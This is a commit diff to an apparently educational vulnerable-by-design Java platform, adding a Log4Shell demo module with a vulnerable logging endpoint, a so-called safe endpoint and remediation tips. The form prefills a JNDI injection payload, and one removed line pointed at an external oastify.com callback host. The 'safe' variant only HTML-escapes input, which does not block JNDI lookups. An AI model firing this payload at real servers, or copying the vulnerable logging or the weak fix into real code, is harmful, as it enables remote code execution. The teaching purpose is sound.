add log4j2 module

whgojp · whgojp · commit 9b58c8e98782 · 2024-10-24T16:34:08.000+08:00
diff --git a/README.md b/README.md
@@ -25,21 +25,23 @@
 
 ## 项目灵感
 
-​	实习期间在甲方单位待了半年多，有机会可以接触到完整的**漏洞生命周期**：很多次做完渗透测试后，通过(TAPD、Jira)发送工单通知研发朋友修复漏洞，经常面临着一些问题：**1、研发不知道为什么这是个漏洞？2、研发不知道这个漏洞怎么修复？**
+​	曾在甲方单位工作过一段时间，有机会可以接触到完整的**漏洞生命周期**：很多次做完渗透测试后，通过(TAPD、Jira)发送工单通知研发朋友修复漏洞，经常面临着一些问题：**1、研发不知道为什么这是个漏洞？2、研发不知道这个漏洞怎么修复？**
 ​	由此，一个想法💡油然而生，恰巧自己也懂些开发知识，想着可不可以通过代码的方式让研发朋友快速了解漏洞的产生与修复……
 
 > 平台提供相关漏洞的安全编码规范，甲方朋友在做SDL/DevSecOps建设的时候，可以考虑加入开发安全培训这一环节
 
 ​	此外，自己也做过安全服务类项目，我想大部分朋友会和我一下，只是按照 信息收集->外网打点->发现漏洞->输出报告 这个流程测试，对于漏洞怎么产生、怎么修复，似乎并不关心……
 
-​	代码审计过程中，通常是先定位SINK点(即代码执行或输出的关键位置)，然后再回溯寻找对应的SOURCE点(即输入或数据来源的位置)。通过将SOURCE点和SINK点串联起来，呐，这就是代码审计
+​	代码审计过程中，通常是先定位SINK点(即代码执行或输出的关键位置)，然后再回溯寻找对应的SOURCE点(即输入或数据来源的位置)。通过将SOURCE点和SINK点串联起来，来完成代码审计工作
 
 > 平台针对每种漏洞提供对应缺陷代码、多种安全安全修复方式(例如：1、升级修复 2、非升级修复)，同时针对代码审计，平台也提供相关漏洞的SINK点
 
-​	再后来，接触了应用安全产品，SCA、SAST、DAST、RASP等，看待安全漏洞似乎又是另一种角度，对于客户来说，采购的安全工具，无论是扫源码、容器、镜像……，都希望尽可能的扫到更多的漏洞，当然也希望少点误报，笔者也或多或少接触到可达性分析等相关技术，想想看，茴香豆的"茴"都有4种写法，一个漏洞的触发方式当然也不尽相同，所以项目中也针对每种漏洞编写了不同的触发场景，感兴趣的朋友可以测试一下……
+​	再后来，接触了应用安全产品，SCA、SAST、DAST、RASP等，看待安全漏洞似乎又是另一种角度，对于客户来说，采购的安全工具，无论是扫源码、容器、镜像……，都希望尽可能的扫到更多的漏洞，当然也希望少点误报，笔者也或多或少接触到可达性分析等相关技术，项目中也针对每种漏洞编写了不同的触发场景，感兴趣的朋友可以测试一下……
 
 > 平台针对同种漏洞提供多种触发场景
 
+……
+
 ## 技术架构
 
 ​	SpringBoot + Spring Security + MyBatis + Thymeleaf + Layui
diff --git a/pom.xml b/pom.xml
@@ -226,12 +226,6 @@
             <version>1.4.14</version>
         </dependency>
 
-<!--        <dependency>-->
-<!--            <groupId>log4j</groupId>-->
-<!--            <artifactId>log4j</artifactId>-->
-<!--            <version>1.2.17</version>-->
-<!--        </dependency>-->
-
         <!-- log4Shell -->
         <dependency>
             <groupId>org.apache.logging.log4j</groupId>
@@ -245,6 +239,12 @@
             <version>2.8.2</version>
         </dependency>
 
+        <dependency>
+            <groupId>org.apache.commons</groupId>
+            <artifactId>commons-text</artifactId>
+            <version>1.9</version> <!-- 使用最新稳定版本 -->
+        </dependency>
+
 
         <!-- shiro-550  -->
         <dependency>
diff --git a/src/main/java/top/whgojp/modules/components/log4j2/controller/Log4j2Controller.java b/src/main/java/top/whgojp/modules/components/log4j2/controller/Log4j2Controller.java
@@ -5,6 +5,7 @@
 import org.apache.logging.log4j.Logger;
 import org.springframework.stereotype.Controller;
 import org.springframework.web.bind.annotation.*;
+import org.apache.commons.text.StringEscapeUtils;
 
 
 /**
@@ -33,5 +34,16 @@ public String vulLog4j2(@RequestParam("payload") String payload) {
         return "[+]Log4j2反序列化："+payload;
     }
 
+    @PostMapping("/safe")
+    @ResponseBody
+    public String safeLog4j2(@RequestParam("payload") String payload) {
+        payload = StringEscapeUtils.escapeHtml4(payload);
+
+        System.out.println("[+]Log4j2反序列化："+payload);
+        logger.error(payload);
+        return "[+]Log4j2反序列化："+payload;
+    }
+
+
 
 }
diff --git a/src/main/resources/static/js/staticcode.js b/src/main/resources/static/js/staticcode.js
@@ -1723,7 +1723,12 @@ const safeXstreamWhiteList = "@RequestMapping(\"/safe-WhiteList\")\n" +
     "    return \"组件漏洞-Xstream Safe-WhiteList\";\n" +
     "}\n"
 
-const vulLog4j2 = "vulLog4j2"
+const vulLog4j2 = "@PostMapping(\"/vul\")\n" +
+    "@ResponseBody\n" +
+    "public String vulLog4j2(@RequestParam(\"payload\") String payload) {\n" +
+    "\tlogger.error(payload);\t//此处解析${}从而触发漏洞\n" +
+    "\treturn \"[+]Log4j2反序列化：\"+payload;\n" +
+    "}"
 const safeLog4j2 = "safeLog4j2"
 
 const vulShiro = "@GetMapping(\"/getAESKey\")\n" +
diff --git a/src/main/resources/templates/vul/components/log4j2.html b/src/main/resources/templates/vul/components/log4j2.html
@@ -27,10 +27,10 @@ <h1><span class="iconfont icon-bug"> 漏洞环境</span></h1>
                             <div class="layui-tab-content">
                                 <div class="layui-tab-item layui-show">
                                     <blockquote class="layui-elem-quote main_btn">
-                                        <form class="layui-form" id="vul-log4j2-form"
+                                        <form class="layui-form" id="vul-log4j2-form" th:action="@{/log4j2/vul}" method="post"
                                               style="display: flex; justify-content: space-between;">
-                                            <input name="payload" type="text" style="width: 450px;"
-                                                   value='${jndi:ldap://vul.5cikvpzkcpk11hycgky8buc970dr1ip7.oastify.com/test}'
+                                            <input type="text" style="width: 450px;" name="payload"
+                                                   value='${jndi:ldap://此处替换为dnslog地址/test}'
                                                    autocomplete="off"
                                                    class="layui-input" id="vul-log4j2-input">
                                             <div style="display: flex; align-items: center;">
@@ -49,21 +49,13 @@ <h1><span class="iconfont icon-bug"> 漏洞环境</span></h1>
                                         <div class="layui-card-header"><i class="fa fa-bullhorn icon-tip"></i>tips</div>
                                         <div class="layui-card-body layui-text layadmin-text">
                                             <pre style="color: #28333e;font-size: 15px;">漏洞原理：
-  log4j2在日志输出中，一旦在log字符串中检测到${}，就会调用lookup查询尝试解析其中的字符串，如果未对字符合法性进行严格的限制，攻击者构造恶意的URL地址让其解析，利用 JNDI协议加载的远程恶意脚本，从而造成RCE。</pre>
+  log4j2在日志输出中，一旦在log字符串中检测到${}，就会调用lookup查询尝试解析其中的字符串，如果未对字符合法性进行严格的限制，攻击者构造恶意的URL地址让其解析，利用 JNDI协议加载的远程恶意脚本，从而造成RCE。
+安全编码规范：
+升级方案：升级Log4j至2.15.0及以上稳定版本
+临时缓解：修改配置文件log4j2.component.propertieslog4j2.formatMsgNoLookups=True</pre>
                                         </div>
                                     </div>
                                 </div>
-
-                                <div class="layui-col-md12">
-                                    <div class="layui-card">
-                                        <div class="layui-card-header"><i class="fa fa-warning icon-output"></i>测试结果
-                                        </div>
-                                        <div class="layui-card-body layui-text layadmin-text">
-                                            <pre id="vul-log4j2-result" style="color: red;font-size: 15px;"></pre>
-                                        </div>
-                                    </div>
-                                </div>
-
                             </div>
                         </div>
                     </div>
@@ -77,66 +69,66 @@ <h1><span class="iconfont icon-code"> 缺陷代码</span></h1>
                 </div>
             </div>
 
-            <div class="layui-col-md12" style="margin-top: 10px">
-                <div class="layui-row layui-col-space15">
-                    <div class="layui-col-md6">
-                        <h1><span class="iconfont icon-anquan"> 安全环境</span></h1>
-                        <div class="layui-tab layui-tab-brief">
-                            <div class="layui-tab-content">
-                                <div class="layui-tab-item layui-show">
-                                    <blockquote class="layui-elem-quote main_btn">
-                                        <form class="layui-form" id="safe-fastjson-form"
-                                              style="display: flex; justify-content: space-between;">
-                                            <input type="text" style="width: 450px;"
-                                                   value='{"test":{"@type":"java.net.Inet4Address","val":"dnslog.com"}}'
-                                                   autocomplete="off"
-                                                   class="layui-input" id="safe-log4j2-input">
-                                            <div style="display: flex; align-items: center;">
-                                                <button class="layui-btn layui-btn-normal"
-                                                        style="width: 100px; margin-left: 10px;"
-                                                        lay-filter="safe-log4j2-submit" lay-submit="">
-                                                    <span class="iconfont icon-zhihang">Run</span>
-                                                </button>
-                                            </div>
-                                        </form>
-                                    </blockquote>
-                                </div>
-
-                                <div class="layui-col-md12">
-                                    <div class="layui-card">
-                                        <div class="layui-card-header"><i class="fa fa-bullhorn icon-tip"></i>tips</div>
-                                        <div class="layui-card-body layui-text layadmin-text">
-                                            <pre style="color: #28333e;font-size: 15px;">安全编码规范:
-    1、升级版本至1.2.83及以上
-    2、禁用AutoType或者是设置特定类白名单进行反序列化
-    3、使用SafeMode模式
-    4、使用@JSONType注解限制类的反序列化</pre>
-                                        </div>
-                                    </div>
-                                </div>
-
-                                <div class="layui-col-md12">
-                                    <div class="layui-card">
-                                        <div class="layui-card-header"><i class="fa fa-warning icon-output"></i>测试结果
-                                        </div>
-                                        <div class="layui-card-body layui-text layadmin-text">
-                                            <pre id="safe-log4j2-result" style="color: red;font-size: 15px;"></pre>
-                                        </div>
-                                    </div>
-                                </div>
-
-                            </div>
-                        </div>
-                    </div>
-
-                    <div class="layui-col-md6">
-                        <h1><span class="iconfont icon-code"> 安全代码</span></h1>
-                        <div class="m-auto div-shadow shadow p-3 mb-5 bg-white rounded">
-                            <div class="code-editor" id="safeLog4j2"></div>
-                        </div>
-                    </div>
-                </div>
-            </div>
+<!--            <div class="layui-col-md12" style="margin-top: 10px">-->
+<!--                <div class="layui-row layui-col-space15">-->
+<!--                    <div class="layui-col-md6">-->
+<!--                        <h1><span class="iconfont icon-anquan"> 安全环境</span></h1>-->
+<!--                        <div class="layui-tab layui-tab-brief">-->
+<!--                            <div class="layui-tab-content">-->
+<!--                                <div class="layui-tab-item layui-show">-->
+<!--                                    <blockquote class="layui-elem-quote main_btn">-->
+<!--                                        <form class="layui-form" id="safe-fastjson-form" th:action="@{/log4j2/vul}" method="post"-->
+<!--                                              style="display: flex; justify-content: space-between;">-->
+<!--                                            <input type="text" style="width: 450px;" name="payload"-->
+<!--                                                   value='${jndi:ldap://此处替换为dnslog地址/test}'-->
+<!--                                                   autocomplete="off"-->
+<!--                                                   class="layui-input" id="safe-log4j2-input">-->
+<!--                                            <div style="display: flex; align-items: center;">-->
+<!--                                                <button class="layui-btn layui-btn-normal"-->
+<!--                                                        style="width: 100px; margin-left: 10px;"-->
+<!--                                                        lay-filter="safe-log4j2-submit" lay-submit="">-->
+<!--                                                    <span class="iconfont icon-zhihang">Run</span>-->
+<!--                                                </button>-->
+<!--                                            </div>-->
+<!--                                        </form>-->
+<!--                                    </blockquote>-->
+<!--                                </div>-->
+
+<!--                                <div class="layui-col-md12">-->
+<!--                                    <div class="layui-card">-->
+<!--                                        <div class="layui-card-header"><i class="fa fa-bullhorn icon-tip"></i>tips</div>-->
+<!--                                        <div class="layui-card-body layui-text layadmin-text">-->
+<!--                                            <pre style="color: #28333e;font-size: 15px;">安全编码规范:-->
+<!--    1、升级版本至1.2.83及以上-->
+<!--    2、禁用AutoType或者是设置特定类白名单进行反序列化-->
+<!--    3、使用SafeMode模式-->
+<!--    4、使用@JSONType注解限制类的反序列化</pre>-->
+<!--                                        </div>-->
+<!--                                    </div>-->
+<!--                                </div>-->
+
+<!--                                <div class="layui-col-md12">-->
+<!--                                    <div class="layui-card">-->
+<!--                                        <div class="layui-card-header"><i class="fa fa-warning icon-output"></i>测试结果-->
+<!--                                        </div>-->
+<!--                                        <div class="layui-card-body layui-text layadmin-text">-->
+<!--                                            <pre id="safe-log4j2-result" style="color: red;font-size: 15px;"></pre>-->
+<!--                                        </div>-->
+<!--                                    </div>-->
+<!--                                </div>-->
+
+<!--                            </div>-->
+<!--                        </div>-->
+<!--                    </div>-->
+
+<!--                    <div class="layui-col-md6">-->
+<!--                        <h1><span class="iconfont icon-code"> 安全代码</span></h1>-->
+<!--                        <div class="m-auto div-shadow shadow p-3 mb-5 bg-white rounded">-->
+<!--                            <div class="code-editor" id="safeLog4j2"></div>-->
+<!--                        </div>-->
+<!--                    </div>-->
+<!--                </div>-->
+<!--            </div>-->
 
         </div>
     </div>
@@ -186,40 +178,6 @@ <h1><span class="iconfont icon-code"> 安全代码</span></h1>
                 value: safeLog4j2
             }));
 
-            // 表单提交的通用函数
-            function handleFormSubmit(url, inputSelector, outputSelector) {
-                var content = $(inputSelector).val();
-                if (content.length === 0) {
-                    layer.msg("输入内容不能为空！");
-                    return false; // 阻止表单提交
-                }
-
-                $.ajax({
-                    url: url,
-                    type: "POST",
-                    contentType: "application/json",
-                    data: content, // 直接发送输入的内容
-                    success: function (result) {
-                        console.log(result)
-                        $(outputSelector).empty();
-                        $(outputSelector).append(result);
-                    },
-                    error: function () {
-                        layer.alert("请求发送失败！");
-                    },
-                });
-
-                return false; // 阻止表单默认提交行为
-            }
-
-            form.on('submit(vul-log4j2-submit)', function (data) {
-                return handleFormSubmit("[[@{/log4j2/vul}]]", "#vul-log4j2-input", "#vul-log4j2-result");
-            });
-
-            form.on('submit(safe-log4j2-submit)', function (data) {
-                return handleFormSubmit("[[@{/log4j2/safe}]]", "#safe-log4j2-input", "#safe-log4j2-result");
-            });
-
         });
 
         $('.log4j').hover(function () {
